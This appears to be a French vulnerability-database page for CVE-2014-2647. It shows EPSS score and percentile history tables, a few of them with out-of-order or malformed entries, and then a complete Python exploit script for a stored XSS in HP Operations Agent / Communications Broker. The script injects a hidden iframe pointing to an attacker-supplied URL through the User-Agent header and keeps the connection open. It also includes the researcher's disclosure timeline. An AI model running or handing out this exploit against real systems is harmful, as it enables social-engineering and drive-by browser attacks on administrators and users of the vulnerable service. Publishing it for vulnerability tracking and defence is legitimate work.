CVE-2014-2647 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	2.17%	–	–
2022-03-13	–	–	1.95%	–	–
2022-04-03	–	–	1.95%	–	–
2022-05-29	–	–	1.95%	–	–
2022-10-23	–	–	1.95%	–	–
2023-01-01	–	–	1.95%	–	–
2023-01-15	–	–	1.95%	–	–
2023-03-12	–	–	–	0.21%	–
2023-07-02	–	–	–	0.21%	–
2023-11-05	–	–	–	0.21%	–
2023-11-12	–	–	–	0.21%	–
2023-11-19	–	–	–	0.21%	–
2023-12-03	–	–	–	0.21%	–
2023-12-17	–	–	–	0.21%	–
2024-02-11	–	–	–	0.21%	–
2024-06-02	–	–	–	0.21%	–
2024-06-02	–	–	–	0.21%	–
2024-10-20	–	–	–	0.2%	–
2024-12-15	–	–	–	0.2%	–
2024-12-22	–	–	–	0.3%	–
2025-01-26	–	–	–	0.21%	–
2025-01-19	–	–	–	0.3%	–
2025-01-25	–	–	–	0.21%	–
2025-03-18	–	–	–	–	5.4%
2025-03-30	–	–	–	–	5.14%
2025-04-06	–	–	–	–	2.05%
2025-04-15	–	–	–	–	2.05%
2025-04-15	–	–	–	–	2.05,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	58%
2022-03-13	56%
2022-04-03	76%
2022-05-29	77%
2022-10-23	78%
2023-01-01	77%
2023-01-15	78%
2023-03-12	57%
2023-07-02	58%
2023-11-05	59%
2023-11-12	58%
2023-11-19	59%
2023-12-03	58%
2023-12-17	59%
2024-02-11	58%
2024-06-02	59%
2024-06-02	59%
2024-10-20	58%
2024-12-15	59%
2024-12-22	69%
2025-01-26	59%
2025-01-19	69%
2025-01-25	59%
2025-03-18	89%
2025-03-30	89%
2025-04-06	82%
2025-04-15	83%
2025-04-15	83%

#!/usr/bin/python # Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection # Date: 10/16/2014 # Exploit Author: Matt Schmidt (Syph0n) # Vendor Homepage: www.hp.com # Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14 # Tested on: Windows 7, SunOS, RHEL Linux # CVE : CVE-2014-2647 # # This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent. # This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent. # Vulnerable page: /Hewlett-Packard/OpenView/BBC/status # This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded. # # Vulnerability Discovered by: Matt Schmidt (Syph0n) # Timeline: # 07/07/2014 - Submitted Discovery to ZDI # 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT. # 07/12/2014 - Contacted HP SSRT # 07/13/2014 - HP SSRT assigned Case SSRT101643 # 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT # 07/30/2014 - Followed up with HP # 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission # 08/13/2014 - Followed up with HP # 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14 # 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date # 08/31/2014 - Followed up with HP again as no response to previous email # 09/04/2014 - Followed up with HP again as no response to previous two emails # 09/14/2014 - Followed up with HP again as no response to previous three emails # 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue" # 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier # 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th. # 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444 # 10/15/2014 - CVE-2014-2647 Issued for this vulnerability import argparse, socket, sys # Define Help Menu if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'): print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n' print ' <TargetIP>: The Target IP Address' print ' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n' print 'Options:' print ' [--port]: The port the HP Communications Broker is running on, default is 383' sys.exit(1) # Parse Arguments parser = argparse.ArgumentParser() parser.add_argument("TargetIP") parser.add_argument("iFrameURL") parser.add_argument("--port", type=int, default=383) args = parser.parse_args() # Define User Agent to be spoofed agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)' # Define Variables host = args.TargetIP port = args.port iFrameURL = args.iFrameURL def main(): # Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n" # Create Socket and check connection to target. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[*] Checking host: " +host+"\n" try: s.connect((host, int(port))) except Exception as e: print "[+] Error Connecting: ", e exit() print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n" # Keep connection alive while payload != 'q': s.send(payload.encode()) data = s.recv(1024) print "[*] Payload Sent." payload = raw_input("\n[+] Keeping Connection Open ([q]uit):") return if __name__ == '__main__': main()